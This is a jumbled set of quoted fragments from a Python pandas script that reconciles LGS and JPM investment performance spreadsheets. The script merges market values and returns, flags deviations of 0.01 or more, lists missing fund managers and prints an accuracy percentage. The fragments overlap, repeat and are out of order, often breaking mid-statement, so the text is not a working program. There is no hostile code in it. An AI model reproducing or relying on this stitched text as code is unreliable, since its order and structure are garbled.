how='right' # )\\ # .sort_values(['Manager', 'Date'])\\ #", "columns_fix = [] for column in columns: if column == 'Market Value_y': columns_fix.append('Market", "= (df_jpm['Market Value']/1000000).round(2) # Reads footers and removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx')", "# Checks for managers that have been completely missed. # Creates set containing", "= columns_fix df_deviations['Deviations'] = deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing,", "Count: ', deviant_count, 'Accuracy: ', accuracy, '%') # Checks for managers that have", "= { 'Page 3 NOF': 'A:N', 'Page 5 NOF': 'B:O', 'Page 6 NOF':", "Prints open accounts that are missing from LGS. print('\\nMissing completely from LGS', df_lgs_missing_completely)", "numpy as np import pandas as pd # START USER INPUT lgs_filepath =", "set(list(df_lgs_open['Manager'])) # Creates set containing strategies. df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy =", "on=['JPM ReportName'], how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS", "deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and", "columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # Calculates accuracy accuracy = round(((total_count", "df_jpm_iap_temp], sort=False) # # df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager',", "Months', 'FYTD_Return': 'FYTD', '12_Return': '1 Year', '36_Return': '3 Years', '60_Return': '5 Years', '84_Return':", "= pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # Calculates accuracy accuracy = round(((total_count - deviant_count)/total_count)*100, 2)", "usecols=columns, skiprows=[0, 1, 2] ) df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed:", "'\\n') print('Total Count: ', total_count, 'Deviant Count: ', deviant_count, 'Accuracy: ', accuracy, '%')", "round(((total_count - deviant_count)/total_count)*100, 2) # Prints accuracy results print('\\nMissing during check from LGS',", "'3 Months', 'FYTD_Return': 'FYTD', '12_Return': '1 Year', '36_Return': '3 Years', '60_Return': '5 Years',", "= pd\\ # .merge( # left=df_jpm_iap, # right=df_jpm, # left_on=['Manager', 'Date'], # right_on=['Manager',", "columns_fix df_deviations['Deviations'] = deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager',", "Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame()", "{ 'Market Value_x': 'Market Value_y', '1_Return': '1 Month', '3_Return': '3 Months', 'FYTD_Return': 'FYTD',", "Years', '60_Return': '5 Years', '84_Return': '7 Years' } # Performs the deviant check", "# Reads footers and removes them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers'])", "'Page 5 NOF': 'B:O', 'Page 6 NOF': 'B:O', 'Page 7 NOF': 'B:O', 'Page", "'FYTD', '12_Return': '1 Year', '36_Return': '3 Years', '60_Return': '5 Years', '84_Return': '7 Years'", "'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11 report_date = dt.datetime(2020, 5, 31) # End USER", "in range(0, len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i])", "int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # # df_jpm_iap = df_jpm_iap.rename(columns={'Account Id':", "check from JPM', jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations, '\\n') print('Total Count: ', total_count,", "them df_footers = pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers']) + [np.nan, 'Excess return'] df_jpm", "= df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates", ") df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 1': 'JPM ReportName', 'Unnamed:", "columns in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1,", "lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i in range(0, len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i] -", "df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # #", "deviants df_deviations['Column'] = columns_fix df_deviations['Deviations'] = deviations df_lgs_missing = pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing", "are open accounts but are not checked. df_lgs_missing_completely = lgs_open_set - lgs_check_set -", "import numpy as np import pandas as pd # START USER INPUT lgs_filepath", "'3_Return': '3 Months', 'FYTD_Return': 'FYTD', '12_Return': '1 Year', '36_Return': '3 Years', '60_Return': '5", "df_lgs_missing_completely) # Import JPM_IAP, Accounts; By ID; Include Closed Accounts; Select All; Mode:", "dt import numpy as np import pandas as pd # START USER INPUT", "'Page 8': df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 4': 'JPM ReportName',", "'3 Years', '60_Return': '5 Years', '84_Return': '7 Years' } # Performs the deviant", "pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp = pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0,", "sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2] )", "deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn))", "for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i in range(0, len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i]", "5 NOF': 'B:O', 'Page 6 NOF': 'B:O', 'Page 7 NOF': 'B:O', 'Page 8':", "for i in range(0, len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation >=", "= 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11 report_date", "JPM', jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations, '\\n') print('Total Count: ', total_count, 'Deviant Count:", "df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates set containing liquidity", "JPM_IAP, Accounts; By ID; Include Closed Accounts; Select All; Mode: Portfolio Only #", "Select All; Mode: Portfolio Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath))", "= pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # # df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap", "0 deviant_count = 0 for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i in range(0,", "# Prints open accounts that are missing from LGS. print('\\nMissing completely from LGS',", "= set(list(df_lgs_liquidity['Manager'])) # Creates set containing fund managers that have been checked. lgs_check_set", "sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2] ) df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode',", "= pd.read_excel('U:/CIO/#Investment_Report/Data/input/testing/20191031 Footers.xlsx') remove_items = list(df_footers['Footers']) + [np.nan, 'Excess return'] df_jpm = df_jpm[~df_jpm['JPM", "lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates set containing liquidity accounts. df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True)", "lgs_check_set - lgs_strategy_set - lgs_liquidity_set - {np.nan} # Prints open accounts that are", "df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 4': 'JPM ReportName', } )", "df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count += 1 if (not", "pd # START USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance", "= set(list(df_lgs_jpm['Manager'])) # Creates set containing fund managers that are open accounts but", "deviants are:\\n') print(df_deviations, '\\n') print('Total Count: ', total_count, 'Deviant Count: ', deviant_count, 'Accuracy:", "'B:O', 'Page 7 NOF': 'B:O', 'Page 8': 'D:O' } for sheet, columns in", "Year', '36_Return': '3 Years', '60_Return': '5 Years', '84_Return': '7 Years' } # Performs", "(not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i],", "managers that are currently open accounts. df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS", "containing liquidity accounts. df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set", "202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD = 11 report_date = dt.datetime(2020, 5, 31)", "= df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market Value']] # #", "in sheet_to_columns_dict.items(): print('Accessing:', sheet) df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2]", "that are currently open accounts. df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name':", "deviant_count = 0 for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i in range(0, len(df_lgs_jpm)):", "= df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to JPM column dictionary lgscolumn_to_jpmcolumn_dict", "df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer' ) df_later =", "# df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market Value']]", "FYTD = 11 report_date = dt.datetime(2020, 5, 31) # End USER INPUT #", "accuracy, '%') # Checks for managers that have been completely missed. # Creates", "JPM Performance Report df_jpm = pd.DataFrame() sheet_to_columns_dict = { 'Page 3 NOF': 'A:N',", "that are open accounts but are not checked. df_lgs_missing_completely = lgs_open_set - lgs_check_set", "df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1)", "# # df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market", "'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates set containing strategies. df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy", "ReportName', 'Unnamed: 2': 'JPM ReportName', } ) if sheet == 'Page 8': df_sheet", "0 for lgscolumn, jpmcolumn in lgscolumn_to_jpmcolumn_dict.items(): for i in range(0, len(df_lgs_jpm)): deviation =", "how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to JPM", "print('\\nThe deviants are:\\n') print(df_deviations, '\\n') print('Total Count: ', total_count, 'Deviant Count: ', deviant_count,", "accounts. df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity = df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager']))", "filename in jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp = pd.read_excel(", "market values from JPM IAP with JPM HTS # df_jpm_main = pd\\ #", "pd.merge( left=df_lgs, right=df_jpm, on=['JPM ReportName'], how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True)", "Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates set containing fund managers that have", "# jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0, 1], # header=0 # ) # df_jpm_iap_temp['Date']", "columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column'] = columns_fix df_deviations['Deviations'] = deviations", "list(df_footers['Footers']) + [np.nan, 'Excess return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs,", "= round(((total_count - deviant_count)/total_count)*100, 2) # Prints accuracy results print('\\nMissing during check from", "missing from LGS. print('\\nMissing completely from LGS', df_lgs_missing_completely) # Import JPM_IAP, Accounts; By", "1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])):", "LGS', df_lgs_missing_completely) # Import JPM_IAP, Accounts; By ID; Include Closed Accounts; Select All;", "df_sheet = pd.read_excel( pd.ExcelFile(jpm_filepath), sheet_name=sheet, usecols=columns, skiprows=[0, 1, 2] ) df_sheet = df_sheet.rename(", "= df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn) deviations.append(deviation) deviant_count +=", "= df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) #", "= pd.DataFrame(lgs_missing, columns=['Manager', 'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # Calculates accuracy accuracy", "== 'Page 8': df_sheet = df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 4': 'JPM", "'Column']) df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # Calculates accuracy accuracy = round(((total_count -", "'A:N', 'Page 5 NOF': 'B:O', 'Page 6 NOF': 'B:O', 'Page 7 NOF': 'B:O',", "'Accuracy: ', accuracy, '%') # Checks for managers that have been completely missed.", "- lgs_strategy_set - lgs_liquidity_set - {np.nan} # Prints open accounts that are missing", "open accounts but are not checked. df_lgs_missing_completely = lgs_open_set - lgs_check_set - lgs_strategy_set", "jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations, '\\n') print('Total Count: ', total_count, 'Deviant Count: ',", "right=df_jpm, on=['JPM ReportName'], how='outer' ) df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates", "df_jpm = df_jpm.reset_index(drop=True) df_jpm = df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value']", "= df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates", "pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # Calculates accuracy accuracy = round(((total_count - deviant_count)/total_count)*100, 2) #", "if column == 'Market Value_y': columns_fix.append('Market Value') else: columns_fix.append(column) df_deviations['Manager'] = deviants df_deviations['Column']", "'60_Return': '5 Years', '84_Return': '7 Years' } # Performs the deviant check df_deviations", ") # Reads JPM Performance Report df_jpm = pd.DataFrame() sheet_to_columns_dict = { 'Page", "dictionary df_lgs_dict = pd.read_excel( pd.ExcelFile(lgs_dictionary_filepath), sheet_name='Sheet1', header=0 ) # Reads JPM Performance Report", "jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0, 1], # header=0 # ) # df_jpm_iap_temp['Date'] =", "+= 1 # Fixes the column names columns_fix = [] for column in", "Creates set containing fund managers that are open accounts but are not checked.", "that have been completely missed. # Creates set containing fund managers that are", "= df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates set containing liquidity accounts.", "for filename in jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename) # df_jpm_iap_temp =", "sheet_name='Sheet1', # skiprows=[0, 1], # header=0 # ) # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]),", "have been completely missed. # Creates set containing fund managers that are currently", "Performs the deviant check df_deviations = pd.DataFrame() deviants = [] columns = []", "= list(df_footers['Footers']) + [np.nan, 'Excess return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge(", "dictionary lgscolumn_to_jpmcolumn_dict = { 'Market Value_x': 'Market Value_y', '1_Return': '1 Month', '3_Return': '3", "fund managers that are open accounts but are not checked. df_lgs_missing_completely = lgs_open_set", ".merge( # left=df_jpm_iap, # right=df_jpm, # left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'], # how='right'", "7 NOF': 'B:O', 'Page 8': 'D:O' } for sheet, columns in sheet_to_columns_dict.items(): print('Accessing:',", "'Page 6 NOF': 'B:O', 'Page 7 NOF': 'B:O', 'Page 8': 'D:O' } for", "Creates LGS to JPM column dictionary lgscolumn_to_jpmcolumn_dict = { 'Market Value_x': 'Market Value_y',", "from JPM IAP with JPM HTS # df_jpm_main = pd\\ # .merge( #", "pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0, 1], # header=0 # ) #", "= pd.read_excel( # jpm_iap_xlsx, # sheet_name='Sheet1', # skiprows=[0, 1], # header=0 # )", "df_later = df_lgs_jpm[df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) df_lgs_jpm = df_lgs_jpm[~df_lgs_jpm['Manager'].isin([np.nan])].reset_index(drop=True) # Creates LGS to JPM column dictionary", "31) # End USER INPUT # Reads LGS table df_lgs = pd.read_csv(lgs_filepath) #", "set(list(df_lgs_strategy['Manager'])) # Creates set containing liquidity accounts. df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS Liquidity'].isin([1])].reset_index(drop=True) df_lgs_liquidity =", "# Prints accuracy results print('\\nMissing during check from LGS', lgs_missing) print('\\nMissing during check", "USER INPUT # Reads LGS table df_lgs = pd.read_csv(lgs_filepath) # Reads LGS dictionary", "pd.DataFrame() sheet_to_columns_dict = { 'Page 3 NOF': 'A:N', 'Page 5 NOF': 'B:O', 'Page", "columns=['Manager', 'Column']) # Calculates accuracy accuracy = round(((total_count - deviant_count)/total_count)*100, 2) # Prints", "# Creates set containing fund managers that are currently open accounts. df_lgs_open =", "= [] for column in columns: if column == 'Market Value_y': columns_fix.append('Market Value')", "df_jpm_missing = pd.DataFrame(jpm_missing, columns=['Manager', 'Column']) # Calculates accuracy accuracy = round(((total_count - deviant_count)/total_count)*100,", "completely from LGS', df_lgs_missing_completely) # Import JPM_IAP, Accounts; By ID; Include Closed Accounts;", "'Unnamed: 4': 'JPM ReportName', } ) df_jpm = pd.concat([df_jpm, df_sheet], sort=False) df_jpm =", "print('\\nMissing during check from LGS', lgs_missing) print('\\nMissing during check from JPM', jpm_missing) print('\\nThe", "if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) total_count += 1 # Fixes", "lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx'", "'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates set containing liquidity accounts. df_lgs_liquidity = df_lgs_dict[df_lgs_dict['LGS", "- deviant_count)/total_count)*100, 2) # Prints accuracy results print('\\nMissing during check from LGS', lgs_missing)", "[np.nan, 'Excess return'] df_jpm = df_jpm[~df_jpm['JPM ReportName'].isin(remove_items)].reset_index(drop=True) df_lgs_jpm = pd.merge( left=df_lgs, right=df_jpm, on=['JPM", "= sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame() # for filename in jpm_iap_filenames: # jpm_iap_xlsx", "'U:/CIO/#Data/output/investment/checker/lgs_table.csv' jpm_filepath = 'U:/CIO/#Data/input/jpm/report/investment/LGSS Preliminary Performance 202005.xlsx' lgs_dictionary_filepath = 'U:/CIO/#Data/input/lgs/dictionary/2020/06/New Dictionary_v10.xlsx' FYTD =", "df_jpm_iap = pd.concat([df_jpm_iap, df_jpm_iap_temp], sort=False) # # df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) #", "{ 'Page 3 NOF': 'A:N', 'Page 5 NOF': 'B:O', 'Page 6 NOF': 'B:O',", "Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name': 'Manager'}) lgs_strategy_set = set(list(df_lgs_strategy['Manager'])) # Creates set", "+= 1 if (not pd.isna(df_lgs_jpm[jpmcolumn][i])) and (pd.isna(df_lgs_jpm[lgscolumn][i])): lgs_missing.append((df_lgs_jpm['Manager'][i], lgscolumn)) if (pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not", "set containing fund managers that are open accounts but are not checked. df_lgs_missing_completely", "LGS', lgs_missing) print('\\nMissing during check from JPM', jpm_missing) print('\\nThe deviants are:\\n') print(df_deviations, '\\n')", "'Unnamed: 1': 'JPM ReportName', 'Unnamed: 2': 'JPM ReportName', } ) if sheet ==", "Open'].isin([1])].reset_index(drop=True) df_lgs_open = df_lgs_open.rename(columns={'LGS Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates set containing", "sheet_to_columns_dict = { 'Page 3 NOF': 'A:N', 'Page 5 NOF': 'B:O', 'Page 6", "df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2) # Reads footers and", "axis=1) df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2) # Reads footers and removes them df_footers", "Name': 'Manager'}) lgs_open_set = set(list(df_lgs_open['Manager'])) # Creates set containing strategies. df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS", "deviant_count)/total_count)*100, 2) # Prints accuracy results print('\\nMissing during check from LGS', lgs_missing) print('\\nMissing", "Checks for managers that have been completely missed. # Creates set containing fund", "Performance Report df_jpm = pd.DataFrame() sheet_to_columns_dict = { 'Page 3 NOF': 'A:N', 'Page", "= [] columns = [] deviations = [] jpm_missing = [] lgs_missing =", "Creates set containing strategies. df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy = df_lgs_strategy.rename(columns={'LGS Name':", "= pd.DataFrame() # for filename in jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath + filename)", "df_jpm_iap = pd.DataFrame() # for filename in jpm_iap_filenames: # jpm_iap_xlsx = pd.ExcelFile(jpm_iap_filepath +", "df_jpm = df_jpm.replace('-', np.nan) df_jpm = df_jpm.drop(columns=['ModelCode'], axis=1) df_jpm['Market Value'] = (df_jpm['Market Value']/1000000).round(2)", "skiprows=[0, 1], # header=0 # ) # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) #", "column names columns_fix = [] for column in columns: if column == 'Market", "NOF': 'B:O', 'Page 7 NOF': 'B:O', 'Page 8': 'D:O' } for sheet, columns", "df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market Value']] # # # Merges the market values", "# jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' # jpm_iap_filenames = sorted(os.listdir(jpm_iap_filepath)) # df_jpm_iap = pd.DataFrame() #", "as np import pandas as pd # START USER INPUT lgs_filepath = 'U:/CIO/#Data/output/investment/checker/lgs_table.csv'", "sort=False) # # df_jpm_iap = df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager', 'Date',", "JPM HTS # df_jpm_main = pd\\ # .merge( # left=df_jpm_iap, # right=df_jpm, #", "Fixes the column names columns_fix = [] for column in columns: if column", "for column in columns: if column == 'Market Value_y': columns_fix.append('Market Value') else: columns_fix.append(column)", "for managers that have been completely missed. # Creates set containing fund managers", "df_jpm_iap.rename(columns={'Account Id': 'Manager'}).reset_index(drop=True) # df_jpm_iap = df_jpm_iap[['Manager', 'Date', 'Market Value']] # # #", "Include Closed Accounts; Select All; Mode: Portfolio Only # jpm_iap_filepath = 'U:/CIO/#Investment_Report/Data/input/testing/jpm_iap/' #", "df_sheet.rename( columns={ 'Unnamed: 0': 'ModelCode', 'Unnamed: 1': 'JPM ReportName', 'Unnamed: 2': 'JPM ReportName',", "deviations = [] jpm_missing = [] lgs_missing = [] total_count = 0 deviant_count", "4': 'JPM ReportName', } ) df_jpm = pd.concat([df_jpm, df_sheet], sort=False) df_jpm = df_jpm.reset_index(drop=True)", "right=df_jpm, # left_on=['Manager', 'Date'], # right_on=['Manager', 'Date'], # how='right' # )\\ # .sort_values(['Manager',", "print(df_deviations, '\\n') print('Total Count: ', total_count, 'Deviant Count: ', deviant_count, 'Accuracy: ', accuracy,", "= set(list(df_lgs_open['Manager'])) # Creates set containing strategies. df_lgs_strategy = df_lgs_dict[df_lgs_dict['LGS Strategy Aggregate'].isin([1])].reset_index(drop=True) df_lgs_strategy", "range(0, len(df_lgs_jpm)): deviation = df_lgs_jpm[lgscolumn][i] - df_lgs_jpm[jpmcolumn][i] if deviation >= 0.01: deviants.append(df_lgs_jpm['Manager'][i]) columns.append(jpmcolumn)", "'1_Return': '1 Month', '3_Return': '3 Months', 'FYTD_Return': 'FYTD', '12_Return': '1 Year', '36_Return': '3", "# header=0 # ) # df_jpm_iap_temp['Date'] = dt.datetime(int(filename[:4]), int(filename[4:6]), int(filename[6:8])) # df_jpm_iap =", "missed. # Creates set containing fund managers that are currently open accounts. df_lgs_open", "'1 Month', '3_Return': '3 Months', 'FYTD_Return': 'FYTD', '12_Return': '1 Year', '36_Return': '3 Years',", "= df_lgs_liquidity.rename(columns={'LGS Name': 'Manager'}) lgs_liquidity_set = set(list(df_lgs_liquidity['Manager'])) # Creates set containing fund managers", "NOF': 'B:O', 'Page 6 NOF': 'B:O', 'Page 7 NOF': 'B:O', 'Page 8': 'D:O'", "fund managers that are currently open accounts. df_lgs_open = df_lgs_dict[df_lgs_dict['LGS Open'].isin([1])].reset_index(drop=True) df_lgs_open =", "(pd.isna(df_lgs_jpm[jpmcolumn][i])) and (not pd.isna(df_lgs_jpm[lgscolumn][i])): jpm_missing.append((df_lgs_jpm['JPM ReportName'][i], jpmcolumn)) 